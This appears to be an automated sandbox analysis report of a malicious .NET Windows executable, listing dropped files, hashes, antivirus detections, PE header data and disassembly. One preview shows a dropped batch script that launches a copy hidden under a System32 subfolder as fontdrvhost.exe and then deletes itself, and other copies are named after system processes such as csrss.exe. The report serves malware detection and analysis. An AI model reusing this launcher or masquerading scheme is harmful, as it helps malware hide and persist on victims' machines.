                                                  Preview:Fupnlk8QR99nW65vxvMk3to9myYrVfxnyzsrpdVPJiXWYKAirI9D614WFqAwLR5vMWyhONFTa6aUVSlcy0ANgtq75Vl8ciD1nlJBWcTdCpm9ajAxFi7URrPcp1l2lG113jrtIjGVhgL1GrhWVy34ltk5WqVe1a25yvG12QogclxvgXW8UPhxN6QJ9vXcNleGnPCVlpeEJXb96zZ8UXKl3Fs1f61G3MS1HqHRUAXovdn0eRNKWYH0a2NihL0oyXK7Fk1PrHoT9f0ab2WNsrufEbaPdiuJKs0YSpv4Z8cOuy15CxHoym6Gnp3nKmwJXeIQpcIvHcxuPfuPkfMqbFUiwuumwHtxLT1PpkPjoVhWyL0H5nCpZGsSKke5rf99sAi6ofjAPnBGh8tk3nqIEEXFliFFFT1JVhnxm4daECZwFluM03CEy04ondVFZe45v2u9U588JQEColA9x3OMRxUen9KJjXAjIdAN1v155D4iw29BdVRgPro8hPWUuyYwQe3KlwHCBTRN2wsu9JpNFdTazCplYhKGpIRR8zaqOPf6aaFvhmUlILqxLdUiHgneILiuebvKt9907WAY63EwMi7dbdFfe1irlByP2VRG1K2JL0zyd5lOc1RjNESAVPq1aRO6ivglm74BqyRkoRCiPUPttOBxCQvleAs4l3PsZAme6P3ZxrWDNHlGBfMUttiVMThpFX8vBTJPrvwdVlAV4rXWYl2Gq58pbQRnsNTZslC38WYQss8ItNbf5KQdf1EFVdxbdJvIRkmSpdYCNlY7606Ozwri6z40g6iei7wi70
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):226
                                                  Entropy (8bit):5.3467126928258955
                                                  Encrypted:false
                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                                                  MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                                                  SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                                                  SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                                                  SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                  Process:C:\Recovery\JRFdtWyAvbQxLlvO.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):226
                                                  Entropy (8bit):5.3467126928258955
                                                  Encrypted:false
                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                                                  MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                                                  SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                                                  SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                                                  SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                  Process:C:\Recovery\csrss.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):226
                                                  Entropy (8bit):5.3467126928258955
                                                  Encrypted:false
                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                                                  MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                                                  SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                                                  SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                                                  SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):209
                                                  Entropy (8bit):5.069068062955259
                                                  Encrypted:false
                                                  SSDEEP:6:hITg3Nou11r+DEPeW5/GKOZG1N723fTBH:OTg9YDEPJ7aV
                                                  MD5:39382ED1EF4E727ED39C38364B42EB34
                                                  SHA1:39C6B7069B2B1AA1AB2367717AC866EB7A569AD5
                                                  SHA-256:F55C203CA291B2B0AA20B866FAA3FFB581151B8680929DE9AB0A0005B2BAD4CD
                                                  SHA-512:7B288D35951A30943636ECF8FD96E35AA5CEF67D0EAC373C1BE7A4FE69AD53E70F12E54E1738BAE8331B7558D8DD294C3DD664016B4F14AC7F8F14B5172B79C2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Windows\System32\iasnap\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\PQCfAXDYbo.bat"
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.083856189774725
                                                  Encrypted:false
                                                  SSDEEP:3:7sri1fqzS:7sreqzS
                                                  MD5:6CB29B483C9790D94140E7A1DFBEC87B
                                                  SHA1:978645D13B9B56F7240212316873CCD48D9CBE6E
                                                  SHA-256:A731F55E2CE57AB46A68BF3B09D0B0644913C153C9D35512D29B54B4379828E3
                                                  SHA-512:9BC6FA01374306C025B57FC54BB6D728BA456B7BD7830BCF21D4587631B21CEDB703911A282F0B93B5ED275F77999EADFDAF49DA11F6EA4360DD595DC54E6384
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:SYPxCZ4NlYMCPx202Os9ZrlDo
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):26624
                                                  Entropy (8bit):5.208733578124225
                                                  Encrypted:false
                                                  SSDEEP:384:mNINl2zwX7auEjDtWwkcJPdK4Elw/Kb/j0edK0N6uQtJVxhYO7ueG:WelnW6CBMxb/z3eVJu
                                                  MD5:9648A5C08366B431006BCF1591F441DC
                                                  SHA1:4C6D186BEA7A135D5C518C4DAFE1B6593C81B336
                                                  SHA-256:64AE5410F978DF0F48DCC67508820EA230C566967E002703C23C67088883B3BF
                                                  SHA-512:86018D403CE5E1DC98F4A5AD39ECE09074F2464E1BB80C627D61ABF817E603847EF9B45716B3314CCD66D2DDEB2BAA040FB154926B2AB730AD4A11A76CFC38A6
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 29%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 57%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..D..."......nb... ........@.. ....................................@................................. b..K.................................................................................... ............... ..H............text...tB... ...D.................. ..`.rsrc............ ...F..............@..@.reloc...............f..............@..B................Pb......H........;..t%..........da...............................................0.............i.@.......o....(....(....8.......9.....(.....(.....(......8..........(....r...p......%......(.....(...........%. .'........o....&.....(....r...p......%......(.....(...........%. .'........o....&(....o....o....(....(....&.*...J.~....(....&8....*..0.......... ........8........E................K...8....~.....~.....i(....8v..... ....(....8...........&8........... ....8....r...p(....(....(....s.
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):275
                                                  Entropy (8bit):5.816226430567527
                                                  Encrypted:false
                                                  SSDEEP:6:dKWOgvQukR0jCcLoc5Sjj1Xs9O0Xx/zFWB/VhZy86lgNQv4oIxmCcXJ:dKRxR0OU5SjS95x7FW1B4C6/J
                                                  MD5:3DB98759A67A5D3DB4FEB7860FA776BF
                                                  SHA1:9EFA90E42530EC37BBC8E426B8A6F95DF11F8EAF
                                                  SHA-256:B5D8C2393AD8855288087DA691055DFD0676E0B0ED747ED071A34570A98C9453
                                                  SHA-512:0628E92E96393815872E1A9A48398431C2364FB67FD435BFA8E748E357259B42F7B548686EDD1E0C8AC7A1DB3EBE728F85E451EFDD747983587E44C858E9879B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:vkbQaFskCzEaNN5aSXmvUjwDvB35RjTq9EvTiuK1Vc0GruIjzhTKsV6MyYfZMwTcfXbIbm1hNuZ1tqWA3TFtPI8nIjeKOvoiJXkTT9INqw775FcHBef2qjNXZxA1HrTcG0rVGDr4L2DdLAsCGXIuPv2jKM3f8QF8df1EXHB7wlryguLZF7uuiiMU8HL3KM55wEAqJno9VL7nEDDZBeaAfVZ4ShGQ6IxkpvBbufPbTvZXljP4Ev1pv5ZapGYlhYCMXW8TCmpgO9rt6CSsRLM
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):26624
                                                  Entropy (8bit):5.208733578124225
                                                  Encrypted:false
                                                  SSDEEP:384:mNINl2zwX7auEjDtWwkcJPdK4Elw/Kb/j0edK0N6uQtJVxhYO7ueG:WelnW6CBMxb/z3eVJu
                                                  MD5:9648A5C08366B431006BCF1591F441DC
                                                  SHA1:4C6D186BEA7A135D5C518C4DAFE1B6593C81B336
                                                  SHA-256:64AE5410F978DF0F48DCC67508820EA230C566967E002703C23C67088883B3BF
                                                  SHA-512:86018D403CE5E1DC98F4A5AD39ECE09074F2464E1BB80C627D61ABF817E603847EF9B45716B3314CCD66D2DDEB2BAA040FB154926B2AB730AD4A11A76CFC38A6
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 29%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 57%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..D..."......nb... ........@.. ....................................@................................. b..K.................................................................................... ............... ..H............text...tB... ...D.................. ..`.rsrc............ ...F..............@..@.reloc...............f..............@..B................Pb......H........;..t%..........da...............................................0.............i.@.......o....(....(....8.......9.....(.....(.....(......8..........(....r...p......%......(.....(...........%. .'........o....&.....(....r...p......%......(.....(...........%. .'........o....&(....o....o....(....(....&.*...J.~....(....&8....*..0.......... ........8........E................K...8....~.....~.....i(....8v..... ....(....8...........&8........... ....8....r...p(....(....(....s.
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):964
                                                  Entropy (8bit):5.899221724789633
                                                  Encrypted:false
                                                  SSDEEP:24:wmTVSlfsU3VgysWLKfT2t2QSwsvFGGdE0R7F6rkN0D:JpsfsUVgrgt2FvgMGkNu
                                                  MD5:F77905AFAC1E70499124CEC7825A2B18
                                                  SHA1:41E96A5EB016217D93B70818B9846FD2F90AF070
                                                  SHA-256:B964547BB77A8095AE13EA274316D25047284998634C54C0093C959D304D3B8C
                                                  SHA-512:00FBEE7EB4D139450D086C325E115884312B3F9FADE84C4FCB0AA3307AED38CCE595A1F5D7281213F6B22ACEE75A420A1CFE98A518DB956021BCDA7A5F0C187E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:0P69quPtMxtdAr7Od990iLhRZq4ndelG6upODmchaPzec7kRoxTUWbZorojAzlPrMngQBtK1hcaSVCycFn9qLQteUAgZCbryAISzaTP5mcx4BGTpzH4Mmig63B5AMvyFvlSMu9CwYEDsdzdOr1j5hfLblV6YYOs1orJZyG40EIyifycEirTUL2iPa1lYDnXJVLEvpEak7t0Yrn5x310q4YqvI396fgxbuoNTtqYdQsXcCKiw5xfLxqO6fSmwFdFa5ZnCamDMcWaLBNt8UMBrAlnDZQyaDmYxn6gmgfWSuStbQD5Rjob2bYaUvknJymIz7miErGcz0s7r1MwWUg0ZLgVPgL152MeHK3dne1kdLmBtascjxQyRvsnbRSifOg6nOzh8tI1d5XOjemyxtSIlYMVcQCWMSFOopYekLe0oZUWYeD6oduv6YUPBeEsqwpK0Ij4GHNmOcdMD068MGrsiTSPUIdGGwJ2tJgQ4J0hPHhe4IMLhGfkE7mg0Uj7oHgcSlc3TqDCQKcawxVM6Si9Qjywh9akj23IlEMTpT11DcU3fLuC9XBVigLtxqVUQdcXRTzrlBhnar6xO4QWPXkM0hjE3cf87hkjA6lLWCb70Y50kXe2Z9E22QhuuuyIfip3HXxSSF9N6nWcmtef8ni7dsqtZ1blNTbRsBtNkMkU906P3EIBQTJ2AsaYqD2boY9nLFtk9Q5wCO7mwa0UtaU4JjR9lVggTJpl1SDyVhB9XX0vvymQNisODEdmxt9ouZc3iWudXB9LYUhvsfOwtQSvaahxyaAliXP846MYDI3Mjh0shs3SeM5eGrcIy7o6AXmBFi0wS0tkWGL3kyPGhsGWbu1NdEjFd6LL4yn81H9odUHAfihAriZSQQjUqnSNQnGZ4A9wLROZsc3Gn1r5hjY5h34oOSRNyvYzNrFfjuyaT9jyXcrz6XqqPL2BFVh3ABl7DD35v
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):26624
                                                  Entropy (8bit):5.208733578124225
                                                  Encrypted:false
                                                  SSDEEP:384:mNINl2zwX7auEjDtWwkcJPdK4Elw/Kb/j0edK0N6uQtJVxhYO7ueG:WelnW6CBMxb/z3eVJu
                                                  MD5:9648A5C08366B431006BCF1591F441DC
                                                  SHA1:4C6D186BEA7A135D5C518C4DAFE1B6593C81B336
                                                  SHA-256:64AE5410F978DF0F48DCC67508820EA230C566967E002703C23C67088883B3BF
                                                  SHA-512:86018D403CE5E1DC98F4A5AD39ECE09074F2464E1BB80C627D61ABF817E603847EF9B45716B3314CCD66D2DDEB2BAA040FB154926B2AB730AD4A11A76CFC38A6
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Metadefender, Detection: 29%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 57%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..D..."......nb... ........@.. ....................................@................................. b..K.................................................................................... ............... ..H............text...tB... ...D.................. ..`.rsrc............ ...F..............@..@.reloc...............f..............@..B................Pb......H........;..t%..........da...............................................0.............i.@.......o....(....(....8.......9.....(.....(.....(......8..........(....r...p......%......(.....(...........%. .'........o....&.....(....r...p......%......(.....(...........%. .'........o....&(....o....o....(....(....&.*...J.~....(....&8....*..0.......... ........8........E................K...8....~.....~.....i(....8v..... ....(....8...........&8........... ....8....r...p(....(....(....s.
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):26624
                                                  Entropy (8bit):5.208733578124225
                                                  Encrypted:false
                                                  SSDEEP:384:mNINl2zwX7auEjDtWwkcJPdK4Elw/Kb/j0edK0N6uQtJVxhYO7ueG:WelnW6CBMxb/z3eVJu
                                                  MD5:9648A5C08366B431006BCF1591F441DC
                                                  SHA1:4C6D186BEA7A135D5C518C4DAFE1B6593C81B336
                                                  SHA-256:64AE5410F978DF0F48DCC67508820EA230C566967E002703C23C67088883B3BF
                                                  SHA-512:86018D403CE5E1DC98F4A5AD39ECE09074F2464E1BB80C627D61ABF817E603847EF9B45716B3314CCD66D2DDEB2BAA040FB154926B2AB730AD4A11A76CFC38A6
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 29%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 57%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..D..."......nb... ........@.. ....................................@................................. b..K.................................................................................... ............... ..H............text...tB... ...D.................. ..`.rsrc............ ...F..............@..@.reloc...............f..............@..B................Pb......H........;..t%..........da...............................................0.............i.@.......o....(....(....8.......9.....(.....(.....(......8..........(....r...p......%......(.....(...........%. .'........o....&.....(....r...p......%......(.....(...........%. .'........o....&(....o....o....(....(....&.*...J.~....(....&8....*..0.......... ........8........E................K...8....~.....~.....i(....8v..... ....(....8...........&8........... ....8....r...p(....(....(....s.
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):451
                                                  Entropy (8bit):5.847024944130405
                                                  Encrypted:false
                                                  SSDEEP:12:o6XeXnMFX5U5NF4PEKxD6pmTyOXBMR8vQaX0w+n:o8kMFX5cNFq1D+OXBQ+Q0+n
                                                  MD5:AEE82A6221C4DC484C7965F42CF8F67B
                                                  SHA1:CAC8305549E8BF5EC276B5E46BFA95FD6E7D42B4
                                                  SHA-256:9129F469A4F34EA94F0EC3E9E4287BF2A367A9237C8E1EFFF9745CECD6F65E1C
                                                  SHA-512:E5E84112BF9503DCBFBEBF1E9241F1FD17FFEE2CD5EB066F6DC9D565C116E63DD9AA1142D3ACAFCCBE2457F3D823066EFC8737ECCB4D81DF276A40359BF560DE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:qvws54dPy09G9ymr6PwriAXZxD79WFGuoZc0VHg1uBEmHCfs64vMae2pXW526e3tuPbkVwVys47h6uSuhPCbT3TKgwc9Lo5QIU21l5WKj6dfhVtmELUqbba05RDjTWnE9rYl1aJl222WZxnKDz4ATOyr4C6U1x0NTZg06HunCtyjjDbHo2fdbmuu2rqzeytFBpDARwO6FQ8kaOH1kyp8SXvrpw7Oa4JN9ti49b01ojYKoJUojzPpJuxo3WUfz9fKHvlrpN2J8yUs8kDfcTolpdEO54AnGVBpDOD2im8W7FrUaEpSTyCgU4eorWvvMODmxppthK7zUSokvty1OsURSfUJuZLL0MJsBEhvY6vI1NLBP327i4ge4vURUg9H8w8HJ5iqMDcS6LaFUS30gOm6qoxQuPa26nKEOD2UVLufbOhtVP7BnJkuJBbeHS67mkVTAV0
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):5.208733578124225
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  File size:26624
                                                  MD5:9648a5c08366b431006bcf1591f441dc
                                                  SHA1:4c6d186bea7a135d5c518c4dafe1b6593c81b336
                                                  SHA256:64ae5410f978df0f48dcc67508820ea230c566967e002703c23c67088883b3bf
                                                  SHA512:86018d403ce5e1dc98f4a5ad39ece09074f2464e1bb80c627d61abf817e603847ef9b45716b3314ccd66d2ddeb2baa040fb154926b2ab730ad4a11a76cfc38a6
                                                  SSDEEP:384:mNINl2zwX7auEjDtWwkcJPdK4Elw/Kb/j0edK0N6uQtJVxhYO7ueG:WelnW6CBMxb/z3eVJu
                                                  TLSH:30C209DA7B9CC567D6198A3EDC97C5480260EE0BA813C41B309A374F28727D9DE057ED
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..D..."......nb... ........@.. ....................................@................................
                                                  Icon Hash:5a3e72f2f0489980
                                                  Entrypoint:0x40626e
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp:0xD2C4E610 [Tue Jan 20 07:21:52 2082 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:v4.0.30319
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x62200x4b.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x1ebc.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
